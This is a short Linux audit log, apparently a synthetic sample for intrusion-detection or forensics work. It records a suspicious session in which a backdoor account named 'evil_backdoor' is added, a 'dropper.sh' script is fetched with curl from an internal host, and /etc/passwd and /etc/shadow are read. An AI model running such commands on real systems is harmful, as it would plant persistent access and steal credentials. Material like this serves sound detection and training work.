type=SYSCALL msg=audit(1700000001.100:1001): arch=c000003e syscall=59 success=yes exit=0 a0=7fff1a2b3c40 a1=7fff1a2b3c50 a2=7fff1a2b3c60 a3=0 items=2 ppid=1234 pid=5001 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=pts0 ses=1 comm="bash" exe="/bin/bash" key="execve_watch"
type=EXECVE msg=audit(1700000001.100:1001): argc=3 a0="bash" a1="-c" a2="cat /etc/passwd"
type=SYSCALL msg=audit(1700000010.200:1002): arch=c000003e syscall=59 success=yes exit=0 a0=7fff2b3c4d50 a1=7fff2b3c4d60 a2=7fff2b3c4d70 a3=0 items=2 ppid=5001 pid=5002 auid=1000 uid=1000 gid=1000 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts0 ses=1 comm="useradd" exe="/usr/sbin/useradd" key="execve_watch"
type=EXECVE msg=audit(1700000010.200:1002): argc=2 a0="useradd" a1="evil_backdoor"
type=SYSCALL msg=audit(1700000010.201:1003): arch=c000003e syscall=2 success=yes exit=4 a0=55d1a2b3c440 a1=0 a2=1b6 a3=0 items=1 ppid=5002 pid=5002 auid=1000 uid=1000 gid=1000 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts0 ses=1 comm="useradd" exe="/usr/sbin/useradd" key="sensitive_file"
type=PATH msg=audit(1700000010.201:1003): item=0 name="/etc/passwd" inode=131073 dev=08:01 mode=0100644 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL
type=SYSCALL msg=audit(1700000025.300:1004): arch=c000003e syscall=59 success=yes exit=0 a0=7fff3c4d5e60 a1=7fff3c4d5e70 a2=7fff3c4d5e80 a3=0 items=2 ppid=5001 pid=5010 auid=1000 uid=1000 gid=1000 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts0 ses=1 comm="curl" exe="/usr/bin/curl" key="execve_watch"
type=EXECVE msg=audit(1700000025.300:1004): argc=3 a0="curl" a1="-s" a2="http://192.168.1.100:8080/dropper.sh"
type=SYSCALL msg=audit(1700000040.400:1005): arch=c000003e syscall=59 success=yes exit=0 a0=7fff4d5e6f70 a1=7fff4d5e6f80 a2=7fff4d5e6f90 a3=0 items=2 ppid=5001 pid=5015 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=pts0 ses=1 comm="ls" exe="/bin/ls" key="execve_watch"
type=EXECVE msg=audit(1700000040.400:1005): argc=2 a0="ls" a1="/tmp"
type=SYSCALL msg=audit(1700000050.500:1006): arch=c000003e syscall=59 success=yes exit=0 a0=7fff5e6f7080 a1=7fff5e6f7090 a2=7fff5e6f70a0 a3=0 items=2 ppid=5001 pid=5020 auid=1000 uid=1000 gid=1000 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts0 ses=1 comm="crontab" exe="/usr/bin/crontab" key="execve_watch"
type=EXECVE msg=audit(1700000050.500:1006): argc=3 a0="crontab" a1="-l" a2="-u"
type=SYSCALL msg=audit(1700000060.600:1007): arch=c000003e syscall=2 success=yes exit=3 a0=55d2b3c4d550 a1=0 a2=1b6 a3=0 items=1 ppid=5001 pid=5025 auid=1000 uid=1000 gid=1000 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts0 ses=1 comm="cat" exe="/bin/cat" key="sensitive_file"
type=PATH msg=audit(1700000060.600:1007): item=0 name="/etc/shadow" inode=131074 dev=08:01 mode=0100640 ouid=0 ogid=42 rdev=00:00 nametype=NORMAL
